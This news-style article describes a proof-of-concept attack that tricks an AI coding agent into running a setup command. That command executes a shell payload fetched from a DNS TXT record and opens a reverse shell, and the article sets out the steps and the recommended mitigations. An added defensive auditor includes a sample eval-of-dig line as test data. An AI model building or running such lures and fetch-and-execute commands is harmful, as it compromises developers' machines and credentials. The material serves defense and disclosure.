Researchers at Mozilla’s Zero Day Investigative Network (0DIN) have published a proof-of-concept attack showing how an AI coding agent can be coerced into executing a malicious payload without any suspicious code present in the cloned repository, without triggering security scanners, and without requiring explicit user approval of a dangerous command.
How the Attack Chain Works
The technique relies on three individually innocuous components that together form a complete attack chain:
- A clean GitHub repository containing standard setup instructions: installing dependencies via `pip3 install -r requirements.txt` and initializing the project with `python3 -m axiom init`.
- A deliberately broken Python package that refuses to run until initialized, throwing an error that instructs the user to execute `python3 -m axiom init`. An AI agent like Claude Code interprets this as a routine setup failure and automatically runs the suggested command in an attempt to recover.
- An initialization script that retrieves a configuration value stored in an attacker-controlled DNS TXT record and executes it as a shell command, delivering the actual payload entirely outside the repository.
The result is an interactive reverse shell running under the developer’s own user privileges. From that position, an attacker gains access to environment variables, API keys, local configuration files, and the ability to establish persistence on the compromised machine.
The Indirection Problem
What makes this technique particularly difficult to detect or defend against is the degree of separation between the agent’s decisions and the eventual harm. As the 0DIN team put it, the reverse shell sits three indirection steps away from anything the agent actually evaluated: an error message it trusted, a shell script that fetched a remote value, and a DNS record the agent never inspected.
Claude Code never chose to open a shell; it chose to fix an error. The agentic behavior that makes these tools useful is precisely what the attack exploits: autonomous error recovery without full visibility into downstream execution.
Distribution Vectors and Mitigations
While this remains a proof-of-concept, 0DIN notes that repositories weaponized in this manner could be distributed convincingly through fake job postings, developer tutorials, blog posts, or direct messages, contexts where a developer might reasonably clone and run an unfamiliar project.
To reduce exposure, 0DIN recommends that AI coding agents be required to disclose their full execution chain for setup commands, including any scripts or values fetched dynamically at runtime. Without that transparency, neither the agent nor the developer has meaningful visibility into what a seemingly routine initialization step is actually doing.
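One concrete form of the transparency check 0DIN calls for is a pre-execution audit of setup and init code that flags shell commands assembled from values fetched at runtime rather than written down in the repository. The following is an added example (not 0DIN's code, nor any agent's real policy); the audit functions, the `load_remote_setting` name and the sample snippets are constructed for illustration.

```python
"""Added example: flag init/setup code whose shell commands are built from
values fetched at runtime, the pattern 0DIN's proof-of-concept relies on.
Hypothetical tool; not part of 0DIN's writeup or any agent's real policy."""
import ast
import re

# Calls that hand a string to a shell or spawn a process.
EXEC_CALLS = {("subprocess", "run"), ("subprocess", "Popen"), ("subprocess", "call"),
              ("subprocess", "check_output"), ("os", "system"), ("os", "popen")}

def _is_literal(node):
    """True if the command argument is fully known at review time."""
    if isinstance(node, ast.Constant):
        return True
    return isinstance(node, (ast.List, ast.Tuple)) and all(
        isinstance(e, ast.Constant) for e in node.elts)

def audit_python(source):
    """Return findings for exec calls whose command is not a literal."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        f = node.func
        if (isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name)
                and (f.value.id, f.attr) in EXEC_CALLS
                and node.args and not _is_literal(node.args[0])):
            findings.append(f"line {node.lineno}: {f.value.id}.{f.attr} "
                            "runs a command assembled at runtime")
    return findings

# Shell: a DNS TXT lookup whose result reaches eval, sh, or a command substitution.
_DNS = re.compile(r"\b(dig|nslookup|host)\b.*\bTXT\b", re.I)
_EXEC = re.compile(r"\beval\b|\|\s*(ba)?sh\b|\bsh\s+-c\b|\$\(|`")

def audit_shell(script):
    """Return findings for lines that capture or execute DNS TXT data."""
    return [f"line {n}: DNS TXT lookup result is captured or executed"
            for n, line in enumerate(script.splitlines(), 1)
            if _DNS.search(line) and _EXEC.search(line)]

# Constructed samples (not 0DIN's code): a routine init step and a suspicious one.
BENIGN_INIT = 'import subprocess\nsubprocess.run(["pip3", "install", "-r", "requirements.txt"])\n'
SUSPICIOUS_INIT = ('import subprocess\n'
                   'cmd = load_remote_setting("init")  # hypothetical runtime fetch\n'
                   'subprocess.run(cmd, shell=True)\n')
SUSPICIOUS_SH = 'eval "$(dig +short TXT setup.example.invalid)"\n'
```

An agent policy could run these audits on the package's init module and any scripts it references before approving a command like `python3 -m axiom init`, surfacing the dynamic fetch the developer would otherwise never see.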
